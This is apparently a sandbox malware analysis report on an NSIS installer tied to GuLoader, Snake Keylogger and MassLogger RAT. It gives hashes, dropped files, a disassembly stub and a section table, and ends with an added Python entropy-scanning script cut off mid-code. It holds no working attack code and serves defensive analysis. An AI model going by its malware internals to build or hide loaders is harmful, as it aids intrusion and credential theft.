Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Cpfkf79Rzk.exe | malicious | GuLoader | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | TjoY7n65om.exe | malicious | Snake Keylogger | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | TVPfW4WUdj.exe | malicious | GuLoader | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | WGi85dsMNp.exe | malicious | GuLoader | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | WtZl31OLfA.exe | malicious | Remcos, GuLoader | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Setup.exe | malicious | Unknown | 142.250.181.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.238, 172.217.16.193
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | WGi85dsMNp.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT
C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.2246975261220179
                                                        Encrypted:false
                                                        SSDEEP:192:IZGZ1ZcgbT0BU/rSdjYmFrvumKzuiF7Z24IO8aj:h1ZcKABU/rSdjnumKzuiF7Y4IO8aj
                                                        MD5:0C976B8E75C04B16EEC7E2CCDB325E20
                                                        SHA1:C357B4CCA00833E2DCCD951B914332B19FC07895
                                                        SHA-256:98144B5E1ED499CE582D02FACB0CE306BAED470AD096BCE1D40D2A1E6EF80BDB
                                                        SHA-512:EA5441B8D4BBAF94DA42ECB046B28B9BA649981996B9B59D9A740A80DA257742D50522C408368DAD526906F159292CD4587D8EB9A89116E708295CF3408A88C1
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.2.8.1.4.2.3.3.0.4.9.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.2.8.1.4.4.9.0.8.5.9.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.4.8.f.4.d.b.-.b.4.0.a.-.4.d.e.d.-.8.9.e.9.-.2.a.6.e.c.f.0.6.6.1.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.a.7.a.d.0.a.-.f.2.b.2.-.4.d.7.f.-.a.b.7.0.-.c.5.3.7.e.d.2.9.2.8.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.A.M.V.u.s.D.M.P.P...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.u.p.r.a.o.c.u.l.a.r. .t.a.i.l.o.r.i.z.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.7.8.-.0.0.0.1.-.0.0.1.3.-.4.d.6.a.-.0.e.e.8.b.d.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.7.5.6.a.f.7.0.8.d.6.2.5.a.d.9.1.d.7.b.9.3.c.7.8.2.2.5.0.2.0.0.0.0.0.0.0.9.0.4.!.0.0.0.0.1.7.5.7.c.8.0.0.b.7.6.5.3.4.5.d.5.1.a.2.6.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 00:15:44 2025, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):280554
                                                        Entropy (8bit):3.758471502062987
                                                        Encrypted:false
                                                        SSDEEP:3072:S4MT45X6yw5gZyp6L4uEqqzTLTgQpdPrWe:TOL2ZywL4fjTgSdJ
                                                        MD5:255AC1826754DA840B69C25D47DD7BFB
                                                        SHA1:A096F18A04195709A8DC380AF67E64C073E7C6CF
                                                        SHA-256:956215038FD2FA2B9DB4689A3EA03EDDD78CE8040C8BE45A8C9E19078FEB05A2
                                                        SHA-512:9C2BEB6EFE1B74CBDC19023B9A1765CFD23F2832257B5712C9B76AEF81133C7FD3A6BE8D566F03E6B5E1489469045C8025B91B7A1BECCDCD4AA88F53FCF03D0C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... .......0..g............t............"..|........%..._..........T.......8...........T........... c...............,..........................................................................................eJ..............GenuineIntel............T.......x......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):6338
                                                        Entropy (8bit):3.724583943526375
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJ5X6IZ0YU40dprR889b6Ksft+m:R6lXJJ6IZ0YU40xp6pfN
                                                        MD5:0F0BC28A956194AAAE53DBE29ED4DD2A
                                                        SHA1:BDA1295CF3E702B2B953BA657E8B410449170373
                                                        SHA-256:7D26FA3C7DAD230C2041586ADCAB88366B51F49B54E023EF681554AB8B5B363B
                                                        SHA-512:C571EDA62E51E15AB504E0DAE920AED5E45885D71D45CA52D84282901149E68B461EADED1A57A2C015D5612E09AF3790068D08417B44E462307BB13ACC9243A8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.1.6.<./.P.i.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4672
                                                        Entropy (8bit):4.504038271592486
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zsTJg77aI9VqWpW8VYMYm8M4JbjFC+q8wh0wjwQRd:uIjftI7HL7VIJw/0wMQRd
                                                        MD5:222F5A0662A9F6BE1C3A03890A096681
                                                        SHA1:5522AAF1A9694BA7D11701D564F2FD958CBD1E60
                                                        SHA-256:C140E884C1A786368045B0CB61C21BE21F98EC1023A413552709D31AD6A7234E
                                                        SHA-512:BFEC5BAECA13C9F71747D9E5DEE297981F07692103757F344BBB9EE2870BC256CC89044F11C0F63F7F03217373EA887E3E2422DD28DF4ACBDDB97BA0AA3CB736
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670518" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                        Category:dropped
                                                        Size (bytes):484658
                                                        Entropy (8bit):7.809711763657168
                                                        Encrypted:false
                                                        SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                        MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                        SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                        SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                        SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):112291
                                                        Entropy (8bit):1.249420131631438
                                                        Encrypted:false
                                                        SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                        MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                        SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                        SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                        SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):286225
                                                        Entropy (8bit):7.710114949306163
                                                        Encrypted:false
                                                        SSDEEP:6144:tIDUHdfSOxO7G+xkFHmRKJCbqkLdzd2DI22C9pYV:t5xhC/6FHQGwqmB+I6S
                                                        MD5:34F265250B7ED15DC0990A62F24E4D46
                                                        SHA1:9B704DA4147DFCF5A8E79E6510344D69BFD4DA51
                                                        SHA-256:ED4A13E1A9C95FCE5A54AB84B479D07F8900E58C6A4B4CE71D442FA3171F4FF4
                                                        SHA-512:C990A4472DB4D9EE7E766DE924AB2A843971BC1624C8A79099709B27BBA04B5223C47362588C1DFD835CD45E14CD03E5D8BD17BC198858BB6AD38DCE316734D0
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):362089
                                                        Entropy (8bit):1.23992084267325
                                                        Encrypted:false
                                                        SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                        MD5:A4340182CDDD2EC1F1480360218343F9
                                                        SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                        SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                        SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                        Category:dropped
                                                        Size (bytes):139354
                                                        Entropy (8bit):1.2473328695625903
                                                        Encrypted:false
                                                        SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                        MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                        SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                        SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                        SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29090
                                                        Entropy (8bit):4.557557000479259
                                                        Encrypted:false
                                                        SSDEEP:768:pHSuQk1y9dJm5jpRjBzovMg5UmxBCedq+:pHb0yRjB5ga+r3
                                                        MD5:E6704DB94EBC651D67A06C37F49BE45B
                                                        SHA1:291DDC7027CB3DEE53C9D67B2EA8200AF11352D2
                                                        SHA-256:EB2552A216C6B17EDCD5C758F162A778047B8EB25F7927C48591FBE87F7EF21C
                                                        SHA-512:4DAB316D438F748E21CCD8865D43BE332712A3BA2A12B7C53FB023E8D59F0429D39E03702E9C20A82B02ECD27133107C448722354E41E382949819EEEBC87542
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.719859767584478
                                                        Encrypted:false
                                                        SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                        MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                        SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                        SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                        SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
• Filename: WGi85dsMNp.exe, Detection: malicious
• Filename: WGi85dsMNp.exe, Detection: malicious
• Filename: czHx16QwGQ.exe, Detection: malicious
• Filename: rXKfKM0T49.exe, Detection: malicious
• Filename: b5BQbAhwVD.exe, Detection: malicious
• Filename: 9Yn5tjyOgT.exe, Detection: malicious
• Filename: 6ZoBPR3isG.exe, Detection: malicious
• Filename: V7OHj6ISEo.exe, Detection: malicious
• Filename: 2CQ2zMn0hb.exe, Detection: malicious
• Filename: 6mGpn6kupm.exe, Detection: malicious
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1439902
                                                        Entropy (8bit):5.50423023217672
                                                        Encrypted:false
                                                        SSDEEP:24576:vI5xhHFHNZm2Ro3xX3y4bz2lWwWo6rSTZye:+tZtRoBXbz2luo6rS1ye
                                                        MD5:C0586E009617EADA0D82E3C7809D4169
                                                        SHA1:DE3E11D2209A23DEECC8CBA975042CBAD8E49C5F
                                                        SHA-256:7A3A77EEC2C93A1792B7B2D3BE81E4E3A8296AC20798B163876B768480E8396F
                                                        SHA-512:ECF2323E8C6AE3438A1BF87DAFFD8910512B02E8C94FA0244192B2DA2DD7711F58135D98A1C9D2316CD19A8C0B6354D8D7D198F84683655EC16212D3997026E3
                                                        Malicious:false
                                                        Preview:,6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.295990285181049
                                                        Encrypted:false
                                                        SSDEEP:6144:h41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+2lmBMZJh1Vjf:W1/YCW2AoQ0Ni4lwMHrVL
                                                        MD5:3CCC3287BCB60DED9FA787DAE0C296B9
                                                        SHA1:71FD298E387E0FC66E19500712EBE9E9442448B7
                                                        SHA-256:6EE500FBFA3047079E0804EE90AC7C0EA37A23DFC5769883F0E98B954B7DC6D2
                                                        SHA-512:1805137C28E7E0E665500880305A8D405449BDDCA30BCDCAD71B1060BD30A99E9A2BCBB357C6ACC89B1575965CDBC5BF25236B426F0D3BF0910148B0C6F691E7
                                                        Malicious:false
                                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB.@.c..............................................................................................................................................................................................................................................................................................................................................Y.T.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.958154658093199
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:4AMVusDMPP.exe
                                                        File size:997'399 bytes
                                                        MD5:ed6f1c14e085e4fbc7c47f894f2140b9
                                                        SHA1:1757c800b765345d51a261e11ebe1d89f05c4865
                                                        SHA256:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a
                                                        SHA512:2b4e7c8669272fd353516d9ba3931536106d480fa11731b445715830098f3f74884f661702bdf25e3d50d1424920f08e1743b2ff4ca65291f3a8f3f98c7fe385
                                                        SSDEEP:24576:9jwKCNd9QdnQK3gxR4Fm9/brSz8pCKDzJyhb1hy5xVgQ7O:V1CqnQc6YKPJyhbzyziV
                                                        TLSH:0025230BF5C3EDAFC5A7C83598B65A97E8BBAD032480D143B374361E5C752E18826793
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                        Icon Hash:46224e4c19391d03
                                                        Entrypoint:0x4034a5
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A230h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080ACh]
                                                        call dword ptr [004080A8h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042A24Ch], eax
                                                        je 00007F2D888139E3h
                                                        push ebx
                                                        call 00007F2D88816CADh
                                                        cmp eax, ebx
                                                        je 00007F2D888139D9h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F2D88816C27h
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F2D888139BCh
                                                        push 0000000Ah
                                                        call 00007F2D88816C80h
                                                        push 00000008h
                                                        call 00007F2D88816C79h
                                                        push 00000006h
                                                        mov dword ptr [0042A244h], eax
                                                        call 00007F2D88816C6Dh
                                                        cmp eax, ebx
                                                        je 00007F2D888139E1h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F2D888139D9h
                                                        or byte ptr [0042A24Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [0042A318h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 004216E8h
                                                        call dword ptr [00408188h]
                                                        push 0040A384h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8504           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x55000          0x21068       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x6409        0x6600    bfe2b726d49cbd922b87bad5eea65e61  False     0.6540287990196079  data       6.416186322230332  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x1396        0x1400    d45dcba8ca646543f7e339e20089687e  False     0.45234375          data       5.154907432640367  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x20358       0x600     8575fc5e872ca789611c386779287649  False     0.5026041666666666  data       4.004402321344153  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2b000          0x2a000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x55000          0x21068       0x21200   03ed2ed76ba15352dac9e48819696134  False     0.8714696344339623  data       7.556190648348207  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
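The per-section entropy values in the section table are the quickest static hint of where an NSIS installer keeps its packed payload: here .rsrc sits at 7.56 bits/byte and the file as a whole at 7.96, while .text is at 6.4. The script below is an added example, not code from the report or from Joe Sandbox. It decodes IMAGE_SECTION_HEADER records, computes 8-bit Shannon entropy over each section's raw bytes and flags any non-code section at or above a threshold. The section names, sizes, addresses and characteristics are the ones the table lists for this sample; everything else is an assumption of the example: the PointerToRawData values (laid out back to back from 0x400), the section bodies (constructed filler, with SHA-256-derived pseudo-random bytes standing in for .rsrc) and the 7.0 threshold. .ndata, the NSIS stub's uninitialized data section with raw size 0, yields an empty body and is never flagged.

```python
import hashlib
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER, 40 bytes, little-endian: Name[8], VirtualSize,
# VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")

CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
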